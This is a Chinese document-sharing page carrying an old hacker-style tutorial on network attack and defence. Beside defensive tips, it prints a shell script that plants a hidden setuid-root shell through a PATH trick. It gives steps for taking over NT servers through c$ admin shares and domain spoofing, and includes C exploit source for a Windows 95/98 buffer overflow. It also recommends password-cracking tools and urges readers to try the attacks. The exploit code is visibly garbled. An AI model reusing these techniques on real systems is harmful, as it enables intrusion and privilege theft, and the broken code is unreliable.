欢迎来到冰豆网! | 帮助中心 分享价值,成长自我!
冰豆网
全部分类
  • IT计算机>
  • 经管营销>
  • 医药卫生>
  • 自然科学>
  • 农林牧渔>
  • 人文社科>
  • 工程科技>
  • PPT模板>
  • 求职职场>
  • 解决方案>
  • 总结汇报>
  • 党团工作>
  • ImageVerifierCode 换一换
    首页 冰豆网 > 资源分类 > DOCX文档下载
    分享到微信 分享到微博 分享到QQ空间

    网络攻防基础教程.docx

    • 资源ID:10488497       资源大小:25.90KB        全文页数:12页
    • 资源格式: DOCX        下载积分:15金币
    快捷下载 游客一键下载
    账号登录下载
    微信登录下载
    三方登录下载: 微信开放平台登录 QQ登录
    二维码
    微信扫一扫登录
    下载资源需要15金币
    邮箱/手机:
    温馨提示:
    快捷下载时,用户名和密码都是您填写的邮箱或者手机号,方便查询和重复下载(系统自动生成)。
    如填写123,账号就是123,密码也是123。
    支付方式: 支付宝    微信支付   
    验证码:   换一换

    加入VIP,免费下载
     
    账号:
    密码:
    验证码:   换一换
      忘记密码?
        
    友情提示
    2、PDF文件下载后,可能会被浏览器默认打开,此种情况可以点击浏览器菜单,保存网页到桌面,就可以正常下载了。
    3、本站不支持迅雷下载,请使用电脑自带的IE浏览器,或者360浏览器、谷歌浏览器下载即可。
    4、本站资源下载后的文档和图纸-无水印,预览文档经过压缩,下载后原文更清晰。
    5、试题试卷类文档,如果标题没有明确说明有答案则都视为没有答案,请知晓。

    网络攻防基础教程.docx

    1、网络攻防基础教程 网络攻防的基础教程制作:shaokejian单机安全 你有一台电脑,平时用来上上网,玩玩游戏,偶尔也敲点公文进去,你认为它挺安全的,但有一天,你的朋友突然告诉你,他有你的上网帐号和密码,你相信吗?不要不信,这种方法挺多的,假如你用的是WINDOWS,假如你拨号上网的密码写了保存,那任何人只要在你的电脑上运行某个小软件就 我从来不保存什么密码你可能要得意的说,但你的朋友在你电脑里装了一个木马,可以捕捉拨号网络那个“连接到”的Caption,然后记下你所按的键盘,悄悄地将文件写入一个加密过的文本后再自动退出会点编程的人应该都做得到,你的电脑是不是失守了? 设了屏幕保护密码天啊,重

    2、启动后还有什么? 设定了管理策略,用策略编辑器编辑过,如果不输密码他就进不了,进去了也什么都干不成!把你的user.dat和system.dat删掉后用我的代替,这个主意你认为怎么样? 当然我不是让你杯弓蛇影弄得一个朋友都没有只能形影相吊这样活着太没劲啦! 如果你的电脑没有机密资讯的话当然无所谓,如果有保证尽量少的人接触它! 写了这么多都是WIN9X的,UNIX系统里这方面的问题是不是就少了呢?从物理方面来说,如果一台机器摆放的位置不安全,能让人有足够的时间打开机箱做一些手脚,你的机器就无法安全,就拿我的机子来说吧,我有两块硬盘,但在WIN9X和NT里都看不到第二块硬盘的影子我把它装上了LIN

    3、UX,而且只能从一个特定的地方启动它,启动之后,在LINUX下,我可以任意的用mount命令装其它操作系统里的所有数据一扫而空局域网安全 基于同样的道理,局域网中的电脑在物理上仍然要严加控制,同时还要经常性地注意局域网中用户的一些非正常的举动为什么?这还用问,就拿我身边的例子来说吧,我有个朋友,公司里三十多台电脑连成一个局域网,但这家伙总想弄到主机的最高权限,于是乎监听SMB密文、安装木马忙得不亦乐乎最后呢,当然得手了,毕竟是我的哥们嘛:) 还有,比如在UNIX中最好要限制ROOT只能由主控台(console)登录、要谨慎使用su命令等等,不然都会给同一网域内的一群“虎视眈眈”想获取最高权限者

    4、以机会 辟如说:shell环境变量PATH中包含用冒号分开的目录名清单,shell按照清单中给定的顺序搜索这些目录,找出运行的命令的可执行文件,PATH变量的典型内容如下: $ echo $ PATH .:/usr/local/bin:/bin:/usr/bin/:/usr/X11/bin 但如果你是ROOT的话,无论如何要把PATH变量从当前目录开始搜索的设置去掉,不然请考虑下面的可能性:甲请你过去在他的终端上做某些管理员职能,你去了,su成ROOT,执行用户要求你做的系统命令后退出ROOT帐号无懈可击,但如果用户将在他的目录下做了一个假的su程序那么你是从当前目录也就是甲的目录开始搜索的,

    5、天啊,你执行的是一个根本不知情的程序,可能是用户自己编写的特洛伊程序,用以记录你的密码 根据上面的原理,你看看如果ROOT不去掉本地目录的话,下面这段代码可能有什么用处吧 #!/bin/sh cp /bin/sh ./stuff/junk/.superdude chmod 4555 ./stuff/junk/.superdude rm -f $0 exec /bin/ls $ 1+$ 然后 % cd % chmod 700. % touch ./-f 明白了吗?这个ls建立了一个隐藏的setuid root的shell的copy 远程安全与黑客常用方法 1、针对个人用户 个人用户在网上最常遇到

    6、的“侵略性”的行为不外乎以下几种 垃圾邮件 这是一个永恒但又无奈的话题,垃圾邮件包括了诸如一些赚钱、广告之类的信件和恶意的人们通过邮件炸弹发来“成吨重”的信件,这不需要任何技巧,也最是无聊我收到的此类信件多如牛毛呀!对付此类信件远程登陆删除就行了,也没有必要非查出该发信人的行踪再施以报复网上这种东西太多,可谓野火烧不尽然后在信箱配置上设定拒收某些人、或者超大的信件就行了,这种垃圾不在我们的讨论范围之内。 蓝屏炸弹 这是针对WIN95的OOB漏洞而开发出来的一些小软件,多命名为*NUKE等等,以前是专门攻击139端口,被攻击的计算机多会出现M$著名的蓝屏蓝屏错误,WIN98下此漏洞已经PATCH

    7、上,所以大多数NUKE软件都已失效了,但最近听说一个叫VOOB的软件对WIN98仍然有效我还没试过呢,要不要拿你开刀?该软件界面如下:(此类软件界面大抵如此,使用简单无比) 要防范此类软件的攻击,一个土办法就是监听端口,网上有许多监听端口的软件,你只要设定好监听的PORT,一旦有人企图向这个端口发送信息包就会被记录下来,然后&%&*,抓到他后,你自己看着办吧 共享文件 这个问题网络里有相当多的安全人士已经提过无数次了,但我每次扫描一个C类地址群的时候都能发现一大群人依旧开着共享没有任何防护而且自得其乐,很抱歉,我看过其中一些人的信、图片甚至更加机密的你的电脑里是不是有这样的托着磁盘的小手呢?

    8、有的话可要小心了,你开着共享呢,也就是说,下面的方法对你来说相当有效 1、本地攻击 c$、d$、admin$和print$这些共享是很危险的.但是出于某些原因不愿意详细提及危险在何处. 众所周知,NT安装以后,将每个磁盘自动分配一个共享,c$,d$和e$等.这些共享是隐藏的共享,在网上邻居是看不到它们的.另外还有 admin$,ipc$,打印机共享后,还会生成print$这个共享. 微软说这些共享是为管理而设置的,且最好不要删除. 实际上,这些c$共享资源都是可访问的,只不过需要一点权限.而print$则一般任何人都可以访问. 缺省地,要访问c$,需要backup operator以上的权限,

    9、即需要文件的备份权限.假设你的NT域内有一个帐号是benny,NT的ip是192.168.0.1,他是Backup operator,而你得到了这个帐号的密码,那么,你就可以通过网络访问NT服务器的c盘,而不管c盘有没有被共享. 方法如下: 在运行命令中输入: 文件:/192.168.0.1/c$ 则一个包含c盘所有文件的窗口将会弹出来. 或者 net use z: 文件:/192.168.0.1/c$ 则NT server上的c:盘就被映射为本地的z:盘. 缺省地,你对这些目录将具有完全控制的权限,你可以用NT入侵升级版的方法,把getadmin的文件传到c盘来取得Administrator

    10、权限. 另外,对于file:/192.168.0.1/print$你不需要backup operator的权限就能完全控制 2、远程攻击 本地攻击的这个技巧很多人都知道,下面来谈谈远程攻击 这个毛病是可以用来远程攻击的! 假设有一台server是 一般人输入 file:/ 后 会出现一个对话框,要你输入密码(但并不要你输入密码) 其实这是一个幌子,maybe微软的开发人员留了一个公用密码,否则,哪有不需要ID就提示输入密码的? 上面,我们提到,在局域网内,只要是backup operator以上级别的人输入这条命令,就不会有密码输入对话框出现,而会直接弹出暴露c盘所有文件和目录的窗口. 如果你

    11、有Backup operator以上的权限,用域欺骗的方法,可以远程访问C盘,并且在缺省情况下受到你的完全控制! C盘文件被控制的风险就是系统完全被控制 发现的步骤: 如上所述,要打开file:/ 则我将自己本地主域控制器的域名也改成xxx,并且也设置一个benny的帐号和密码. 然后拨号上网,再输入 file:/ 后 C盘的目录居然弹出来了,权限是完全控制,欺骗成功! 以上的方法有个问题,如何得知对方的域的名称?用这个命令: NBTstat -A quack注:NBTstat是NT上一个能检验从NetBIOS名到TCP/IP地址的转换的实用工具,能检查NetBIOS的当前佳话状态,也可以把表

    12、项从LMHOSTS文件添加到NetBIOS名字高速缓存中,或者检验注册的NetBIOS名和分配给你的计算机的NetBIOS作用域,与NETSTAT不同的是它只处理NetBIOS连接,而NETSTAT处理你的系统与其它计算机的全部连接。 当然,用这篇Retina的文献中提到的方法,也可以获得其域的名称. 本文的基础是要获得Backup Operator的权限,结果是能获取Administrator权限,Local/Remote都有效. 但是,print$这个目录是不需要什么权限的,任何人都能访问. 因为几乎所有的NT机器的c$目录是打开的,而且就算有人把这个共享删除了,机器重新启动后又会被自动打

    13、开,所以这个安全问题是很严重的.关于域欺骗的问题,是微软的安全漏洞无疑.在这里看到,本文还要用到其它的hack技巧如nbtstat和getadmin,成功入侵一台NT server是要用到很多知识的. 看了之后是不是觉得心惊肉跳你硬盘上的文件全在别人的掌握之中!这种感觉不太好吧,呵,所以如果不是必要的话呢,WIN98文件及打印共享的选项就不要开了,NT下最好对NetBIOS作个限制,要开的话找个安全工具,比如LOCKDOWN2000,汉化后界面如下: 该软件用法相当简单,可以实时监控他人同你的电脑的连接试试你就知道了。 还有些人可能会说我是拨号上网,动态IP,就算共享又怎么样?请问你有没有用I

    14、CQ?ICQ不是有“隐身人”的作用吗?有些人又不服了唉,那你就开着吧,告诉我你的ICQ号 木马侵袭 说到木马很多人的第一反应就是BO,不错,BO的确是迄今为止水平最高的一个木马程序了对了,要解释一下什么是木马吗?就是远程控制软件啦!一个客户端,一个服务器端,两边都装好后在客户端就可以访问远程的服务器了,之所以称其为木马,是因为它往往是在服务器端不知情的情况下被装入的就是说,你一不小心,就“对外开放”了。 网上木马程序很流行,其实说来也很简单,大致都是修改注册表或者INI文件加载一个文件提供服务,这就手工都很容易检测出木马来。一,看增加的不明服务。二,因为木马是作为服务一般要打开一个网络通信端口

    15、,所以检查增加的服务端口也很容易检查出木马程序来。其实完全可以稍微改动操作系统内核而作出一个很好的木马来,这样不用改动注册表也可以让用户很不容易发觉。(比如说将木马做进某个驱动程序里面,就&*%$,咱们劳苦大众想手工检测可就不容易了) 现在流行的一些木马多将自身复制到某个文件夹下隐藏起来,但它要运行就得自启动,所以检查注册表HKEY_LOCAL_MACHINEsoftwaremicrosoftwindowscurrentvisionrun下面有没有什么值得怀疑的对象就行了。如果对这些不熟悉的话,下载一个叫cleaner的软件亦可解决许多木马问题,刚才提到的LOCKDOWN2000也有清除木马功

    16、能。 恶意代码 这可能在聊天室或者浏览页面时发生,现在主要是用java script写成的代码,其作用千奇百怪,举个简单的例子吧,比如众所周知的聊天室攻击手段:让别人开无数个窗口,当然你得把自己的Java关了。(不过现在的聊天室可没那和好破坏了,你最好得先搞清楚某个较有代表性聊天室的ASP代码,对它有一番了解之后,举一反三,自行发挥了。 另一方面是一些包含恶意代码的HTML页面,你有可能在浏览某个页面的时候被人把硬盘格式化了&好夸张哦!下面是一段利用Windows 95/98 UNC 缓存溢出漏洞写成的代码ie5filex.c: #include #include #define MAXBUF

    17、 1000 #define RETADR 53 /* jmp esp (FF E4) code is stored in this area. You must change this address for non-Japanese Windows98 */ #define EIP 0xbfb75a35 unsigned char exploit_code200= 0x43,0x43,0x43,0x43,0x43,0x53,0x53,0x53, 0xB8,0x2D,0x23,0xF5,0xBF,0x48,0x50,0xC3, 0x00 ; main(int argc,char *argv)

    18、FILE *fp; unsigned int ip; unsigned char bufMAXBUF; if (argc8)&0xff; bufRETADR+2=(ip16)&0xff; bufRETADR+3=( ip24)&0xff; memcpy(buf+80,exploit_code,strlen(exploit_code); bufMAXBUF=0; fprintf(fp,%s/n,buf); fprintf(fp,10 seconds later, this machine will be shut down.); fprintf(fp,If you are using IE5 f

    19、or Japanese Windows98, ); fprintf(fp,maybe, the exploit code which shuts down your machine will be executed.); fprintf(fp,n); fclose(fp); printf(%s created.n,argv1); return FALSE; 在Windows 95 和Windows 98的网络代码部分存在溢出漏洞。通过使用一个超长的文名,攻击者可以让用户机器崩溃或执行任意代码。这个漏洞可以通过web页或HTML邮件来加以利用,在用户用浏览器打开此页面或打开邮件时进行攻击。此检验

    20、程序只在日文Windows 98IE4IE5环境下测试。在VC下编译后可以得到一个 ie5filex.exe,直接在DOS下键入ie5filex a,它便会生成一个HTML文件,打开这个文件时会提示错误并且关机,怎么样,有点味道吧! 病毒攻击 病毒是什么就不用我说了吧,它有几个比较让人头疼的特点,破坏、潜伏、自我复制我对病毒了解得并不多,但建议大家开着一个实时监控的软件如NAV,而下载软件时最好先扫描一下再行打开。 当然网络上有些破坏者将病毒裹在信息包中,当成一些好玩的东西发送给别人,对这些不请自来的可执行文件、WORD&EXCEL文档,最好先做扫描(我就曾见过有人将CIH裹在他自己写的一个自

    21、动生成情书的小程序里寄给别人,而且还会将系统的日期调整到四月十六号) 如果想对这方面多些了解,建议到以下几个站点转悠转悠: WEB欺骗 最近台湾发现一起通过WEB欺骗获取受害人的银行帐号的事件(应该也是在九、十月份发生的吧),操作者将某银行的页面拷贝,然后将该银行的URL改写,于是浏览者便在假的银行页面上进行一系列的数据操作当然一切都被记录在入侵者的电脑里了,然后的事情不用我说大家应该也知道了吧这种事情你们可千万不能干呀& 攻击的关键在于要将该银行页面上的所有URL都指向入侵者的机器。 假设攻击者的服务器在机器 当然这种行为要在入侵过的机器上干,要不然很容易就会被人发现你的真实身份,那就逊了&

    22、 2、针对网络主机 网络主机最经常遇到的就是非法进入了你得记住这是违反法律的噢! 假定一个黑客要对某网站进行攻击行为,那么他将使用什么手段进入呢 口令攻击 口令可以说是一个系统的大门,大多数新手开始都是由强攻口令而走上黑客之路的。过去许多系统中都有所谓JOE帐户,既用户名与口令相同的用户现在相对少了,即便如此,还是有相当多的弱口令,如仅在用户名后简单加个数字之类的,那么一些破解口令的程序可就大显身手了。我推荐两个出色的口令解译器给大家: a、小榕软件之流光,可用于检测POP、FTP口令,多线程检测,而且有高效的用户流服务器流模式,探测速度飞快,可以说是同类软件中的佼佼者,小榕同时还有另一优秀的

    23、软件乱刀!,能破解取得的PASSWD文档密文,速度甚至比JOHN还快得多,这两个软件应该是大家工具箱中的宝贝,可以到他的主页去下载使用这两个软件是共享版,需要注册请支持黑客软件!下面是它的运行界面: b、天行软件之网络刺客2 Beta版,这个东东恐怕不需要我说了,三个字:全功能!虽然现在还没有完工,但只要是宝剑,就算在鞘里依然是有其威风的,它包括的功能算了,你自己下载一个好好试试,反正绝不会后悔的。天行同时还有一个安全产品网络卫兵共享版发布。下面是网络刺客的FTP强攻的界面: 扫描 记得似乎是goodwell说过,好的扫描器千金难买,的确如此,其实扫描器就是将已知的系统漏洞写入程序,运行后它会

    24、搜索某一地址的站点,如果该站存在某些已知的漏洞,则扫描器最后的报告中会告知你,那么一名黑客就可以尝试以这些已知的漏洞去进攻有目标了嘛!当然有些可能已被PATCH上了,可有些则不然,成功与否就看你的功力与运气了。绿色兵团zer9发表的WEB Secunity Scanner是我所见扫描器中相当出色的一个,其中个人主页扫描与IIS HACK检查因可能带来危险,所以需要向作者索取KEY才能使用 另一种扫描器是扫描端口的,这也是一种获取主机信息的好方法。比如它能轻易得到运行的操作系统信息以及提供了哪些服务。在UNIX下通常开放许多端口,如13(daytime)19(chargen)等等,而NT只提供一

    25、些通用服务如PORT21,PORT80,同时还在135、139端口进行监听,而WIN95则只在139进行监听,这样操作系统的判别是不是就非常容易了呢?下面这个东东就是干这种事的: 缓冲区溢出漏洞 无论是系统提供的一些调用或是用户编写的程序,有时都可能缺乏对要拷贝的字符串长度的检查。当超过缓冲区长度的字符串被送入过小的缓冲区中时,常会将进程中相邻空间覆盖掉。若较严重的话,可能将堆栈破坏,使程序无法执行。 在UNIX中的某些应用程序,如果我们输入三五页的字符作为命令行参数,看程序的动作的话,有时这个程序会出错,同是会有一个CORE的文件出现,里面可能包含一些你想要的东西。也可以用一类精心写出来的代

    26、码,得用SUID程序中存在的这种错误可以很轻易地取得系统的超级用户权限。由于缓冲区溢出漏洞牵涉到的程序面相当广,一时很难对这类型的攻击做出有效的杜绝。 一般情况下,黑客会在取得目标机器的信息之后到知名的黑客站点查找该种系统以及其上运行的各种服务是否有漏洞,然后将寻找来的一段程序代码上传编译运行 木马 只要是执行用户不知道的任何操作,表面上又仿佛能完成某些正常功能的程序都可称之为木马,它们一般出现在几种时候,一是施放者想借木马夺取某些权限或获取信息时;二是系统被攻破后为方便日后进入而设下各种机关。它可以出现在编译过的程序中,也可以出现在系统管理员需要执行的系统命令中,甚至可以作为消息的一部份发送

    27、。比较精彩的是:一些邮件头(mail headers)允许用户退到shell并执行命令,因为这一特性使邮件在被阅读时激活,黑客利用它便能给终端发送特定的消息,在终端在储存一个命令序列并且执行它听起来很酷吧,做一个试试! 其它(拒绝服务攻击、网络监听)拒绝服务其实说起来也很容易理解,就是让服务器的CPU过载、磁盘饱和、内存不足总之你能想到的能让它动弹不得的行动都可以称之拒绝服务,因为这造成了使用该服务器的正式用户的请求被服务器拒绝。 至于网络监听唉,网络监听!说起来还挺烦,我手真的难受呀,太酸了:(,就是当信息以明文形式在网络上传输时,将网络接口设置在监听模式别说得这么烦了,就是安个监听的软件,就可以将网上传输的信息截获了,常用的监听软件有运行在LinuxSolaris等平台下的Sniffit以及WIN9X、NT下的NetXRay。


    注意事项

    本文(网络攻防基础教程.docx)为本站会员主动上传,冰豆网仅提供信息存储空间,仅对用户上传内容的表现方式做保护处理,对上载内容本身不做任何修改或编辑。 若此文所含内容侵犯了您的版权或隐私,请立即通知冰豆网(点击联系客服),我们立即给予删除!

    温馨提示:如果因为网速或其他原因下载失败请重新下载,重复下载不扣分。




    关于我们 - 网站声明 - 网站地图 - 资源地图 - 友情链接 - 网站客服 - 联系我们

    copyright@ 2008-2022 冰点文档网站版权所有

    经营许可证编号:鄂ICP备2022015515号-1

    收起
    展开